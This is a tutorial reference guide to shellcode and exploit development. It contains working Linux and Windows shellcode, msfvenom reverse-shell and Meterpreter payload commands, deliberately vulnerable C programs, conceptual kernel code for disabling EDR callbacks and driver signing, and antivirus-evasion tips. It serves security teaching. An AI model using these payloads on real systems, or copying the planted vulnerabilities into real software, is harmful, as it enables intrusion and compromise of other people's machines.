# Shellcode ## The Complete Shellcode & Vulnerability Development Reference Guide *From Assembly to Kernel Drivers: A Comprehensive Journey* *** ### Table of Contents 1. Introduction 2. Linux Shellcode Development 3. Windows Shellcode Development 4. Metasploit Workflow 5. Kernel Driver Exploitation 6. Creating Vulnerable Software 7. Debugging & Analysis Tools 8. Common Pitfalls & Solutions *** ### Introduction This guide documents the complete process of shellcode development, from basic assembly to advanced kernel-level exploitation. Whether you're a beginner learning buffer overflows or an experienced researcher developing custom exploits, this reference provides the foundational knowledge and practical examples needed to understand and create working shellcode. #### Key Concepts * **Shellcode**: Position-independent machine code that executes a desired payload * **System Calls**: The interface between user space and kernel functionality * **API Resolution**: The process of dynamically finding function addresses in memory * **Bad Characters**: Bytes that would break the shellcode in specific contexts *** ### Linux Shellcode Development #### Basic Linux execve("/bin/sh") Shellcode **Assembly Code** nasm ``` section .text global _start _start: ; Clear registers to avoid null bytes xor eax, eax ; Clear EAX mov al, 0x0b ; Syscall number for execve (11) ; Build "/bin/sh" string on stack push eax ; Null terminator push 0x68732f2f ; "hs//" (little-endian) push 0x6e69622f ; "nib/" (little-endian) ; Set up registers for syscall mov ebx, esp ; EBX points to "/bin/sh" string xor ecx, ecx ; ECX = NULL (argv) xor edx, edx ; EDX = NULL (envp) int 0x80 ; Trigger syscall interrupt ``` **Compilation and Extraction** bash ``` # Assemble the code nasm -f elf32 shellcode.asm -o shellcode.o # Link for testing ld -m elf_i386 shellcode.o -o shellcode # Extract opcodes objdump -d shellcode.o ``` **Resulting Shellcode** text ``` \x31\xc0\xb0\x0b\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xcd\x80 ``` **Testing Shellcode** c ``` #include char code[] = \ "\x31\xc0\xb0\x0b\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e" "\x89\xe3\x31\xc9\x31\xd2\xcd\x80"; int main() { printf("Shellcode length: %d bytes\n", (int)sizeof(code)-1); int (*ret)() = (int(*)())code; ret(); return 0; } ``` **Compile with:** `gcc -m32 -z execstack -fno-stack-protector test_shellcode.c -o test_shellcode` #### Null-Free Optimized Version nasm ``` section .text global _start _start: ; Clear registers without null bytes xor ecx, ecx ; ECX = 0 mul ecx ; EAX * ECX -> zeros EAX and EDX mov al, 0xb ; Syscall number ; Push string without null bytes push ecx ; Push 0 using cleared register push 0x68732f2f ; "hs//" push 0x6e69622f ; "nib/" mov ebx, esp ; EBX points to string int 0x80 ; Syscall ``` *** ### Windows Shellcode Development #### Key Differences from Linux 1. **No Direct Syscalls**: Must call Windows API functions 2. **Dynamic API Resolution**: Addresses change due to ASLR 3. **PEB Walking**: Technique to find DLL base addresses 4. **API Hashing**: Using hashes instead of string names #### Windows execve Equivalent: WinExec **High-Level Plan** c ``` // What we want to achieve WinExec("calc.exe", 1); ExitProcess(0); // Optional but recommended ``` #### Manual PEB Walking Approach **Conceptual Assembly Structure** nasm ``` start: ; --- 1. Find kernel32.dll base address --- xor ecx, ecx mov esi, [fs:ecx + 0x30] ; PEB pointer mov esi, [esi + 0x0C] ; PEB->Ldr mov esi, [esi + 0x14] ; First module (ntdll.dll) mov esi, [esi] ; Second module (kernel32.dll) mov ebx, [esi + 0x10] ; EBX = kernel32.dll base ; --- 2. Find WinExec by hash --- mov edx, 0x876F8B31 ; Hash of "WinExec" call find_function_by_hash ; --- 3. Call WinExec --- xor edx, edx push edx ; Null terminator push 0x6578652e ; "exe." push 0x636c6163 ; "clac" ("calc" reversed) mov ecx, esp ; ECX points to "calc.exe" push 1 ; uCmdShow = SW_SHOWNORMAL push ecx ; lpCmdLine = "calc.exe" call eax ; Call WinExec find_function_by_hash: ; Complex EAT parsing code ; EBX = DLL base, EDX = hash ; Returns function address in EAX ret ``` #### Practical Metasploit Approach **Installing Metasploit (Without Snap)** bash ``` # Download official installer curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall # Make executable and run chmod +x msfinstall sudo ./msfinstall ``` **Generating Windows Shellcode** bash ``` msfvenom -p windows/exec CMD=calc.exe -f c -a x86 --platform windows -b '\x00' ``` **Flags Explanation:** * `-p windows/exec`: Payload that executes a command * `CMD=calc.exe`: Command to execute * `-f c`: Output format (C array) * `-a x86`: Architecture (32-bit) * `--platform windows`: Target platform * `-b '\x00'`: Remove null bytes (common bad character) **Example Output** c ``` unsigned char buf[] = "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30" "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff" "\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52" "\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1" "\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b" "\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03" "\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b" "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24" "\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb" "\x8d\x5d\x6a\x01\x8d\x85\xb2\x00\x00\x00\x50\x68\x31\x8b\x6f" "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5" "\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a" "\x00\x53\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00"; ``` **Windows Shellcode Testing Program** c ``` #include #include // Paste your msfvenom output here unsigned char code[] = \ "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30" "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff" "\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52" "\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1" "\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b" "\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03" "\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b" "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24" "\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb" "\x8d\x5d\x6a\x01\x8d\x85\xb2\x00\x00\x00\x50\x68\x31\x8b\x6f" "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5" "\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a" "\x00\x53\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00"; int main() { printf("Shellcode length: %d bytes\n", (int)sizeof(code)); // Allocate executable memory void *exec_mem = VirtualAlloc(0, sizeof(code), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); if (exec_mem == NULL) { printf("VirtualAlloc failed!\n"); return -1; } // Copy shellcode to executable memory RtlMoveMemory(exec_mem, code, sizeof(code)); // Execute printf("Executing shellcode...\n"); int (*func)() = (int(*)())exec_mem; func(); printf("Done!\n"); return 0; } ``` **Compile with:** `gcc test_shellcode.c -o test_shellcode.exe` *** ### Metasploit Workflow #### Common msfvenom Payloads **Windows Payloads** bash ``` # Basic calc execution msfvenom -p windows/exec CMD=calc.exe -f c -a x86 --platform windows # Reverse shell msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f c -a x86 # Meterpreter reverse TCP msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f c -a x86 ``` **Linux Payloads** bash ``` # Linux exec msfvenom -p linux/x86/exec CMD=/bin/sh -f c -a x86 --platform linux # Linux reverse shell msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f c -a x86 ``` **Output Formats** bash ``` -f c # C array -f python # Python bytes -f raw # Raw binary -f exe # Windows executable -f elf # Linux ELF binary ``` *** ### Kernel Driver Exploitation #### Why Use Kernel Drivers? Kernel drivers (Ring 0) have complete system authority, enabling capabilities impossible in user mode: #### Common Kernel Driver Techniques **1. Disabling Security Mechanisms** c ``` // Conceptual examples - actual implementation varies DisablePatchguard(); // Bypass Kernel Patch Protection DisableDSE(); // Bypass Driver Signature Enforcement UnregisterCallbacks(); // Remove AV/EDR kernel callbacks ``` **2. Token Stealing Payload** The classic privilege escalation technique: **Conceptual Process:** 1. Find `EPROCESS` structure for `System` process (PID 4) 2. Find `EPROCESS` structure for target process (e.g., cmd.exe) 3. Copy the security `Token` from System to target process 4. Target process now runs as `NT AUTHORITY\SYSTEM` **3. Direct Memory Manipulation** c ``` // Kernel drivers can read/write any process memory ReadProcessMemory(any_pid, any_address, buffer, size); WriteProcessMemory(any_pid, any_address, shellcode, size); ``` #### Kernel Driver Challenges 1. **Patchguard (KPP)**: Must be bypassed on 64-bit Windows 2. **Driver Signature Enforcement (DSE)**: Requires signed drivers or bypasses 3. **Hypervisor-Protected Code Integrity (HVCI)**: Additional memory protection 4. **Kernel Patch Protection**: Prevents modification of core kernel structures #### Practical Considerations * Use **Vulnerable Driver** for testing (like Intel `iqvw64e.sys`) * Test in **VM with protections disabled** initially * Consider **DSE bypass techniques** for research * Always use **development/test environments** *** ### Creating Vulnerable Software Building custom vulnerable applications is crucial for understanding exploitation techniques in isolation. #### 1. Stack-Based Buffer Overflow **Vulnerable Code** c ``` #include #include void vulnerable_function(char *input) { char buffer[64]; strcpy(buffer, input); // No bounds checking! } int main(int argc, char *argv[]) { if (argc > 1) { vulnerable_function(argv[1]); } return 0; } ``` **Compilation Flags:** bash ``` gcc -m32 -fno-stack-protector -z execstack vuln.c -o vuln ``` **Exploitation Steps:** 1. Crash with long input: `./vuln $(python -c "print 'A'*100")` 2. Find EIP overwrite offset 3. Replace with shellcode address #### 2. Format String Vulnerability **Vulnerable Code** c ``` #include int main(int argc, char *argv[]) { if (argc > 1) { printf(argv[1]); // User input as format string! printf("\n"); } return 0; } ``` **Exploitation:** * Read memory: `%x %x %x %x` * Write to memory: `%n` format specifier * Overwrite GOT entries #### 3. Heap Overflow / Use-After-Free **Vulnerable Code** c ``` #include #include #include struct object { char name[32]; void (*print_name)(struct object*); }; void print_object_name(struct object *obj) { printf("Name: %s\n", obj->name); } int main() { struct object *obj1 = malloc(sizeof(struct object)); struct object *obj2 = malloc(sizeof(struct object)); strcpy(obj1->name, "First Object"); obj1->print_name = print_object_name; // Free the object free(obj1); // Use after free - vulnerability! obj1->print_name(obj1); return 0; } ``` #### 4. Integer Overflow **Vulnerable Code** c ``` #include #include #include void process_data(char *data, unsigned int len) { // Integer overflow vulnerability unsigned int buffer_size = len + 10; char *buffer = malloc(buffer_size); if (buffer) { // Potential buffer overflow if len + 10 wraps around memcpy(buffer, data, len); buffer[len] = '\0'; printf("Processed: %s\n", buffer); free(buffer); } } int main() { char data[100]; unsigned int length; printf("Enter length: "); scanf("%u", &length); printf("Enter data: "); read(0, data, 100); process_data(data, length); return 0; } ``` *** ### Advanced Protection Bypasses #### Modern Exploitation Challenges **1. Data Execution Prevention (DEP)** **Problem:** Stack/Heap not executable\ **Solution:** Return-Oriented Programming (ROP) bash ``` # Compile without execstack gcc -m32 -fno-stack-protector vuln.c -o vuln_dep ``` **2. Address Space Layout Randomization (ASLR)** **Problem:** Memory addresses randomized\ **Solution:** Information leaks to defeat randomization bash ``` # Enable ASLR (Linux) echo 2 | sudo tee /proc/sys/kernel/randomize_va_space ``` **3. Stack Canaries** **Problem:** Stack corruption detection\ **Solution:** Leak canary value or bypass check bash ``` # Compile with stack protector gcc -m32 vuln.c -o vuln_canary ``` **4. Control Flow Integrity (CFI)** **Problem:** Indirect call validation\ **Solution:** Advanced ROP techniques, JOP/COP #### Protection Matrix | Protection | Compiler Flag | Bypass Technique | | ------------ | ------------------- | -------------------- | | DEP | `-z noexecstack` | ROP chains | | Stack Canary | `-fstack-protector` | Canary leakage | | ASLR | System setting | Information leak | | PIE | `-fPIE -pie` | Base calculation | | RELRO | `-z relro` | GOT overwrite timing | *** ### Debugging & Analysis Tools #### Essential Tools Checklist **Linux Tools** bash ``` # Debuggers gdb # GNU Debugger gdb with gef/pwndbg # Enhanced GDB plugins # Disassemblers objdump -d # Object file disassembly radare2 # Advanced reverse engineering # Analysis strace # System call tracing ltrace # Library call tracing # Memory analysis gcore # Core dump generation ``` **Windows Tools** bash ``` # Debuggers x64dbg # User-mode debugger WinDbg # Microsoft debugger (kernel/user) # Analysis Process Explorer # Process monitoring Process Monitor # Real-time system monitoring API Monitor # API call tracing ``` **Cross-Platform** bash ``` # Analysis strace/ltrace # Linux system/library calls Wireshark # Network analysis ``` #### GDB Enhanced with GEF/Pwndbg bash ``` # Install GEF wget -q -O ~/.gdbinit-gef.py https://github.com/hugsy/gef/raw/master/gef.py echo "source ~/.gdbinit-gef.py" >> ~/.gdbinit # Common commands gdb ./vuln run $(python -c "print 'A'*100") info registers x/20wx $esp pattern create 100 pattern offset $eip ``` #### Practical Debugging Workflow 1. **Crash Reproduction**: Trigger the vulnerability 2. **Control Verification**: Confirm EIP control 3. **Bad Character Analysis**: Test shellcode bytes 4. **Exploit Development**: Build working payload 5. **Reliability Testing**: Ensure consistent execution *** ### Common Pitfalls & Solutions #### Problem: Shellcode Contains Null Bytes **Solution:** * Use register clearing with `xor reg, reg` * Avoid instructions that generate nulls * Use `msfvenom -b '\x00'` for automatic encoding #### Problem: Shellcode Crashes **Solution:** * Check for bad characters in target context * Verify stack alignment * Ensure proper memory permissions #### Problem: Address Changes Between Runs (ASLR) **Solution:** * Use information leaks to calculate addresses * Implement ROP chains * Use relative addressing where possible #### Problem: Antivirus Detection **Solution:** * Custom shellcode encoding * Obfuscation techniques * Living-off-the-land binaries (LOLBins) #### Problem: Modern Protections **Solution:** * Combine multiple bypass techniques * Use information disclosure vulnerabilities * Chain multiple vulnerabilities together *** ### Quick Reference Commands #### Essential Compilation Flags bash ``` # 32-bit, no protections (learning) gcc -m32 -fno-stack-protector -z execstack vuln.c -o vuln # 32-bit with DEP gcc -m32 -fno-stack-protector vuln.c -o vuln_dep # 32-bit with all protections gcc -m32 vuln.c -o vuln_secure # 64-bit gcc -fno-stack-protector -z execstack vuln.c -o vuln64 ``` #### Metasploit Quick Reference bash ``` # Install curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall chmod +x msfinstall sudo ./msfinstall # Generate payloads msfvenom -p windows/exec CMD=calc.exe -f c -a x86 -b '\x00' msfvenom -p linux/x86/exec CMD=/bin/sh -f c -a x86 msfvenom -p windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=4444 -f exe > payload.exe ``` #### Debugging Commands bash ``` # Linux debugging gdb ./program run $(python -c "print 'A'*100") info registers x/10wx $esp # Windows testing gcc test_shellcode.c -o test_shellcode.exe # Disable AV temporarily for testing! ``` *** ### Conclusion This comprehensive guide covers the complete journey from basic shellcode development to advanced kernel-level exploitation. The key to mastery is practice - start with simple stack overflows, progress through modern protections, and eventually tackle real-world exploitation scenarios. Remember: Always conduct security research in appropriate environments with proper authorization. This knowledge is powerful and should be used responsibly for education, defense, and authorized testing purposes.